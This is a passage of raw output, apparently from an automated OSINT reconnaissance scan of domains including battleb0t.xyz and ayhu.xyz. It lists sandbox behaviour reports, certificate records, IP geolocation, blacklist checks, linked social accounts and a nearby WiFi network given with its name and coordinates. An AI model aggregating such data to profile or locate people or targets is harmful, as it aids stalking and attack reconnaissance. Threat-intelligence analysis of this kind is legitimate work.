Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabB9A.tmp]- [targetUID: 00000000-00003240]'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df7bc6018f44d91351.tmp"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{a4c88c9d-e909-11ed-b4ce-080027d6e927}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df7bc6018f44d91351.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{a4c88c9d-e909-11ed-b4ce-080027d6e927}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{a4c88c9f-e909-11ed-b4ce-080027d6e927}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df1b0105ea70f55f81.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, 
u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "TarBAD.tmp" has type "data"- Location: [%TEMP%\\TarBAD.tmp]- [targetUID: 00000000-00003240]\n "CabBAC.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabBAC.tmp]- [targetUID: 00000000-00003240]\n "flare_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003008]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFCC28235309D36060.TMP" has type "data"- Location: [%TEMP%\\~DFCC28235309D36060.TMP]- [targetUID: 00000000-00003008]\n "~DF1B0105EA70F55F81.TMP" has type "data"- Location: [%TEMP%\\~DF1B0105EA70F55F81.TMP]- [targetUID: 00000000-00003008]\n "~DF4A816B7A645900CB.TMP" has type "data"- Location: [%TEMP%\\~DF4A816B7A645900CB.TMP]- [targetUID: 00000000-00003008]\n "~DF7BC6018F44D91351.TMP" has type "data"- Location: [%TEMP%\\~DF7BC6018F44D91351.TMP]- [targetUID: 00000000-00003008]\n "httpErrorPagesScripts_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "_A4C88C9F-E909-11ED-B4CE-080027D6E927_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._A4C88C9D-E909-11ED-B4CE-080027D6E927_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_AD106546-E909-11ED-B4CE-080027D6E927_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "errorPageStrings_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line 
terminators"- [targetUID: N/A]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00003240]\n "dnserror_1_" has type "HTML document UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "NewErrorPageTemplate_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "3014XX9H.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\3014XX9H.txt]- [targetUID: 00000000-00003008]\n "T4W3H708.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\T4W3H708.txt]- [targetUID: 00000000-00003008]\n "urlref_httpsllink.tou_https%3A%2F%2Freadymag.com%2Fu2462346896%2F4244462%2F" has type "HTML document ASCII text"- [targetUID: N/A]\n "S9KISB1I.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\S9KISB1I.txt]- [targetUID: 00000000-00003008]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003240]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "0LUJE7ZY.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\0LUJE7ZY.txt]- [targetUID: 00000000-00003008]\n "SWVETGDV.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\SWVETGDV.txt]- [targetUID: 00000000-00003008]\n "P4PAXQDE.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\P4PAXQDE.txt]- [targetUID: 00000000-00003008]\n "ETGUG1H9.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ETGUG1H9.txt]- [targetUID: 00000000-00003008]\n "TarB9B.tmp" has type "data"- Location: [%TEMP%\\TarB9B.tmp]- [targetUID: 00000000-00003240]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 
datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003240]\n "CabB9A.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabB9A | 185.199.110.153 |
| 2023-05-12 02:45:30 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:99:a3:5c:44:13:8f:1f:f4:9f:74:e5:4f:ad:57:81:83:24
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 23 20:32:58 2023 GMT
Not After : Jun 21 20:32:57 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:ae:2d:9c:62:18:76:2e:df:de:55:f1:95:af:dc:
59:27:38:8b:5b:00:32:90:fa:a3:fe:5e:92:a6:01:
7f:53:a9:14:85:d5:b4:a7:c0:0d:14:f0:32:f0:be:
0c:a5:54:c5:d2:e3:5d:4e:26:e5:3f:0a:13:30:aa:
26:b9:11:a2:a8:7d:58:6c:52:5f:e4:39:4c:64:b8:
92:f5:ca:b5:bf:a9:b0:6c:9f:4b:b2:34:b7:0e:fd:
c3:4b:d1:55:53:7f:36:89:dc:d0:2b:5e:0c:5f:ed:
95:61:3e:cb:10:b6:d2:99:9c:0c:b8:b3:93:24:f5:
c4:4f:20:e2:fc:24:a0:02:4e:dc:94:c0:26:80:c4:
72:7c:f8:8f:0f:bb:1a:71:64:e0:5b:eb:d2:c0:8c:
13:c3:5d:19:05:5c:35:d5:d3:61:05:f7:49:68:ce:
3f:e7:a7:33:6d:02:b1:87:fe:b7:9f:60:b3:8d:a6:
be:5a:d5:5c:ed:53:5e:27:e0:c9:22:2d:81:ce:b1:
ec:cc:05:c4:f7:86:fc:47:61:ca:71:86:20:b8:14:
9c:ca:b1:05:e4:47:06:cb:1b:86:c7:8f:5e:ba:31:
9b:3c:cb:b9:41:b5:56:e8:d6:32:9d:d1:16:19:02:
ad:d1:e3:f1:4b:c1:d9:61:74:ad:de:6b:c8:4b:60:
db:26:73:9c:89:bb:67:5a:18:24:bc:9e:d0:bb:23:
66:66:fc:2a:b7:81:2b:f5:a0:62:f2:00:e6:a6:5d:
1f:6b:36:2c:f3:42:e0:4d:31:63:fd:7c:96:5d:29:
9b:8b:f6:25:a8:26:32:03:a6:81:0f:c9:d4:8e:46:
76:31:9b:db:08:e1:d6:3d:7b:5e:87:9a:98:cf:cb:
5b:13:ec:f0:64:25:74:03:76:57:14:ba:41:4b:d2:
c1:7e:f3:50:47:af:8d:ee:e4:55:19:8e:20:6c:87:
99:ac:39:f3:6e:8a:21:33:3f:07:aa:28:83:d0:d1:
d8:1c:a8:b7:84:a8:89:95:7f:34:41:7f:a0:83:3e:
cf:d0:5c:c5:e2:ac:17:66:44:17:94:26:73:d2:f6:
3b:d0:cf:9b:f2:1b:3c:6e:17:4d:08:5d:87:80:c7:
6c:c8:40:f5:84:96:5d:f8:9c:bd:ce:4d:4b:f5:0e:
4f:4e:80:4c:0a:a9:22:bf:2e:2d:84:af:ae:ae:d4:
1a:50:8f:be:bf:51:48:e8:9e:33:86:ab:75:90:6e:
5e:7e:85:12:ca:44:de:1a:66:b7:86:cb:c7:c1:40:
7b:6e:f8:ff:44:74:04:48:b1:d2:5b:44:5f:fc:71:
68:46:d9:68:ed:ca:a6:15:15:a5:57:56:d1:00:94:
83:4a:61
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
98:BA:3D:0D:C8:59:5C:05:86:25:C6:DE:57:7A:62:02:A8:E1:D5:36
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
| battleb0t.xyz |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Beyza (Net ID: 00:13:49:45:9F:FA) | 40.2024, 29.0398 |
| 2023-05-12 03:03:16 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | ayhu.xyz | [{u'not_after': u'2023-07-10T04:54:49', u'not_before': u'2023-04-11T04:54:50', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'0d408dd97ca1bd4c0d06c53fc3e92ebc', u'entry_timestamp': u'2023-04-11T05:54:51.221', u'id': 9117673170}, {u'not_after': u'2023-05-12T05:22:09', u'not_before': u'2023-02-11T05:22:10', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'0ce3f41ce8cbbbcf13f76c6f365ec2eb', u'entry_timestamp': u'2023-02-11T06:22:11.299', u'id': 8627857885}, {u'not_after': u'2023-03-14T04:12:31', u'not_before': u'2022-12-14T04:12:32', u'issuer_ca_id': 183283, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0310b430a3e0722fec4ebc95e312bb838d6f', u'entry_timestamp': u'2022-12-14T05:12:32.333', u'id': 8209207679}, {u'not_after': u'2023-03-14T04:12:31', u'not_before': u'2022-12-14T04:12:32', u'issuer_ca_id': 183283, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0310b430a3e0722fec4ebc95e312bb838d6f', u'entry_timestamp': u'2022-12-14T05:12:32.07', u'id': 8196466589}, {u'not_after': u'2023-03-14T04:12:06', u'not_before': u'2022-12-14T04:12:07', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'00ff0e1ea46f55f0740eb383e107c9ea93', u'entry_timestamp': u'2022-12-14T05:12:08.377', u'id': 8196466213}, {u'not_after': u'2023-03-14T03:53:53', u'not_before': u'2022-12-14T03:53:54', u'issuer_ca_id': 183267, 
u'name_value': u'ayhu.xyz\ncpanel.ayhu.xyz\ncpcalendars.ayhu.xyz\ncpcontacts.ayhu.xyz\nmail.ayhu.xyz\nwebdisk.ayhu.xyz\nwebmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'04897c23d88920d1c5b3ae3091443a2381b8', u'entry_timestamp': u'2022-12-14T04:53:55.433', u'id': 8209126729}, {u'not_after': u'2023-03-14T03:53:53', u'not_before': u'2022-12-14T03:53:54', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\ncpanel.ayhu.xyz\ncpcalendars.ayhu.xyz\ncpcontacts.ayhu.xyz\nmail.ayhu.xyz\nwebdisk.ayhu.xyz\nwebmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'04897c23d88920d1c5b3ae3091443a2381b8', u'entry_timestamp': u'2022-12-14T04:53:54.573', u'id': 8196005223}, {u'not_after': u'2023-03-13T19:16:53', u'not_before': u'2022-12-13T19:16:54', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0488a73cdb484e7a5b3055608f2320348b3f', u'entry_timestamp': u'2022-12-13T20:16:55.143', u'id': 8206782905}, {u'not_after': u'2023-03-13T19:16:53', u'not_before': u'2022-12-13T19:16:54', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0488a73cdb484e7a5b3055608f2320348b3f', u'entry_timestamp': u'2022-12-13T20:16:54.437', u'id': 8193169403}, {u'not_after': u'2023-03-13T18:07:06', u'not_before': u'2022-12-13T18:07:07', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\nmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'047ba367f476b8d086bdaa81687c78c65324', u'entry_timestamp': u'2022-12-13T19:07:08.931', u'id': 8206381262}, {u'not_after': u'2023-03-13T18:07:06', u'not_before': u'2022-12-13T18:07:07', u'issuer_ca_id': 183267, 
u'name_value': u'ayhu.xyz\nmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'047ba367f476b8d086bdaa81687c78c65324', u'entry_timestamp': u'2022-12-13T19:07:08.083', u'id': 8192906588}, {u'not_after': u'2023-03-13T17:51:42', u'not_before': u'2022-12-13T17:51:43', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0318ae067efc0b78465c8bfe1a31bf5b16b8', u'entry_timestamp': u'2022-12-13T18:51:43.988', u'id': 8206326761}, {u'not_after': u'2023-03-13T17:51:42', u'not_before': u'2022-12-13T17:51:43', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0318ae067efc0b78465c8bfe1a31bf5b16b8', u'entry_timestamp': u'2022-12-13T18:51:43.756', u'id': 8193180831}] |
| 2023-05-12 03:01:40 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.188): Search Engine; Last Activity: 0 days ago; Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | iMGSRC.RU (Category: images) https://imgsrc.ru/main/user.php?lang=ru&user=login | login |
| 2023-05-12 02:45:22 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 4 | 0 | None | {u'region_code': u'VA', u'country_tld': u'.us', u'ip': u'2600:1f18:2489:8202::c8', u'currency_name': u'Dollar', u'currency': u'USD', u'country_population': 327167434, u'country_code': u'US', u'timezone': u'America/New_York', u'city': u'Ashburn', u'network': u'2600:1f18::/33', u'languages': u'en-US,es-US,haw,fr', u'version': u'IPv6', u'latitude': 39.0469, u'in_eu': False, u'utc_offset': u'-0400', u'continent_code': u'NA', u'country_name': u'United States', u'country_capital': u'Washington', u'org': u'AMAZON-AES', u'postal': u'20149', u'asn': u'AS14618', u'country': u'US', u'region': u'Virginia', u'longitude': -77.4903, u'country_calling_code': u'+1', u'country_area': 9629091.0, u'country_code_iso3': u'USA'} | 2600:1f18:2489:8202::c8 |
| 2023-05-12 03:01:27 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.10): Search Engine; Last Activity: 0 days ago; Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:15:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Twitter (Category: social) https://twitter.com/Battleb0t | Battleb0t |
| 2023-05-12 02:49:28 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}]}, u'total_processes': 18, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://cyberchef.io/', u'signatures': [{u'category': u'General', u'origin': u'API Call', u'identifier': u'api-7', u'name': u'Loads modules at runtime', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1129', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1129', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" loaded module "KERNEL32.DLL" at base 50960000\n "msedge.exe" loaded module "%WINDIR%\\SYSTEM32\\UXTHEME.DLL" at base 4b910000\n "msedge.exe" loaded module "COMBASE.DLL" at base 4e5e0000\n "msedge.exe" loaded module "%WINDIR%\\SYSTEM32\\WINDOWS.SYSTEM.PROFILE.PLATFORMDIAGNOSTICSANDUSAGEDATASETTINGS.DLL" at base 32cf0000\n "msedge.exe" loaded module "NTDLL.DLL" at base 50f80000\n "msedge.exe" loaded module "API-MS-WIN-DOWNLEVEL-SHELL32-L1-1-0.DLL" at base 4ef60000\n "msedge.exe" loaded module "SHELL32.DLL" at base 4f1e0000\n "msedge.exe" loaded module "USER32.DLL" at base 4e450000\n "msedge.exe" loaded module "API-MS-WIN-CORE-SYNCH-L1-2-0" at base 4dce0000\n "msedge.exe" loaded module "API-MS-WIN-CORE-FIBERS-L1-1-1" at base 4dce0000\n "msedge.exe" loaded module "ADVAPI32.DLL" at base 50a10000\n "msedge.exe" loaded module "API-MS-WIN-CORE-LOCALIZATION-L1-2-1" at base 4dce0000\n "msedge.exe" loaded module "KERNEL32" at base 50960000\n "msedge.exe" loaded module "API-MS-WIN-CORE-STRING-L1-1-0" at base 4dce0000\n "msedge.exe" loaded module "API-MS-WIN-CORE-DATETIME-L1-1-1" at base 4dce0000\n "msedge.exe" loaded module 
"API-MS-WIN-CORE-LOCALIZATION-OBSOLETE-L1-2-0" at base 4dce0000'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-8', u'name': u'Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"19001a002101000040c7e54df87f0000@ntdll.dll"\n "220023002101000018c7e54df87f0000@ntdll.dll"\n "19001a006de6000040c7e54df87f0000@ntdll.dll"\n "220023006de6000018c7e54df87f0000@ntdll.dll"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:4664:120:WilError_01"\n "InternetShortcutMutex"\n "Local\\SM0:4176:304:WilStaging_02"\n "Local\\SM0:4176:120:WilError_01"\n "SM0:4176:120:WilError_01"\n "SM0:4176:304:WilStaging_02"\n "Local\\SM0:4664:120:WilError_01"\n "Local\\SM0:4664:304:WilStaging_02"\n "SM0:4664:120:WilError_01"\n "SM0:4664:304:WilStaging_02"\n "ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:4664:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:4664:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:4664:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:443"\n 
"216.239.36.178:443"\n "142.251.2.155:443"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-161', u'name': u'Contains ability to modify processes thread functionality (API string)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1106', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1106', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'Observed API string:"OpenThread" [Source: 00000000-00004176.00000000.77481.4EB6F000.00000002.mdmp]'}, {u'category': u'Pattern Matching', u'origin': u'YARA Signature', u'identifier': u'yara-104', u'name': u'YARA signature match - RC4 Encryption', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1486', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1486', u'relevance': 5, u'threat_level': 0, u'type': 13, u'description': u'YARA signature for RC4 encryption matched on process "00000000-00004176"\n YARA signature for RC4 encryption matched on file "Ruleset Data"\n YARA signature for RC4 encryption matched on file "widevinecdm.dll"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sync Data\\LevelDB\\000003.log]- [targetUID: 00000000-00004664]\n "ef14caa0-45b8-4340-8ce8-25763dac1526.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ef14caa0-45b8-4340-8ce8-25763dac1526.tmp]- [targetUID: 00000000-00004664]\n "manifest.json" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\hyphen-data\\101.0.4906.0\\manifest.json]- [targetUID: 
00000000-00004664]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00004664]\n "f_00023e" has type "Web Open Font Format (Version 2) TrueType length 44300 version 1.720"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00004664]\n "deny_domains.list" has type "data"- Location: [%TEMP%\\4664_24740021\\deny_domains.list]- [targetUID: 00000000-00004664]\n "6714d6eb-a6fb-4baa-978b-770bb059a14a.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\6714d6eb-a6fb-4baa-978b-770bb059a14a.tmp]- [targetUID: 00000000-00004664]\n "f_00023d" has type "gzip compressed data from Unix original size modulo 2^32 4279879"- [targetUID: N/A]\n "Filtering Rules-AA" has type "data"- Location: [%TEMP%\\4664_220317772\\Filtering Rules-AA]- [targetUID: 00000000-00004664]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\hyphen-data\\101.0.4906.0\\manifest.fingerprint]- [targetUID: 00000000-00004664]\n "4b9e49a8-043a-44fa-8115-86fd2dca8e57.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\4b9e49a8-043a-44fa-8115-86fd2dca8e57.tmp]- [targetUID: 00000000-00004664]\n "Session_13322605195158610" has type "data"- [targetUID: N/A]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00001268]\n "edge_confirmation_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4664_770442581\\edge_confirmation_page_validator.js]- 
[targetUID: 00000000-00004664]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00004664]\n "safety_tips.pb" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\SafetyTips\\2844\\safety_tips.pb]- [targetUID: 00000000-00004664]\n "LICENSE" has type "ASCII text with CRLF line terminators"- Location: [%PROGRAMFILES%\\(x86)\\Microsoft\\Edge\\Application\\103.0.1264.37\\Trust Protection Lists\\Mu\\LICENSE]- [targetUID: 00000000-00004664]\n "temp-index" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\index-dir\\temp-index]- [targetUID: 00000000-00004664]\n "a940d667-2ab1-4f32-83c5-cd719578504a.tmp" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]'}, {u'category': u'Installation/Persistence', u'origin': u'File/Memory', u'identifier': u'string-4', u'name': u'Found a string that may be used as part of an injection method', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1055/011', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1055.011', u'relevance': 4, u'threat_level': 0, u'type': 2, u'description': u'"Shell_TrayWnd" (Taskbar window class may be used to inject into explorer with the SetWindowLong method)'}, {u'category': u'Installation/Persistence', u'origin': u'File/Memory', u'identifier': u'string-184', u'name': u'Found registry location strings which can modifies auto-execute functionality', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1547/001', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-270', u'attck_id': u'T1547.001', u'relevance': 5, u'threat_level': 0, u'type': 2, u'description': u'Observed string:"software\\microsoft\\windows\\currentversion\\run" [Source: 00000000-00004176.00000000.77481.4EB6F000.00000002.mdmp]\n Observed string:"software\\microsoft\\windows\\currentversion\\runonce" [Source: 
00000000-00004176.00000000.77481.4EB6F000.00000002.mdmp]'}, {u'category': u'Environment Awareness', u'origin': u'File/Memory', u'identifier': u'string-143', u'name': u'Contains ability to retreive system language (API string)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1614/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1614.001', u'relevance': 1, u'threat | 185.199.110.153 |
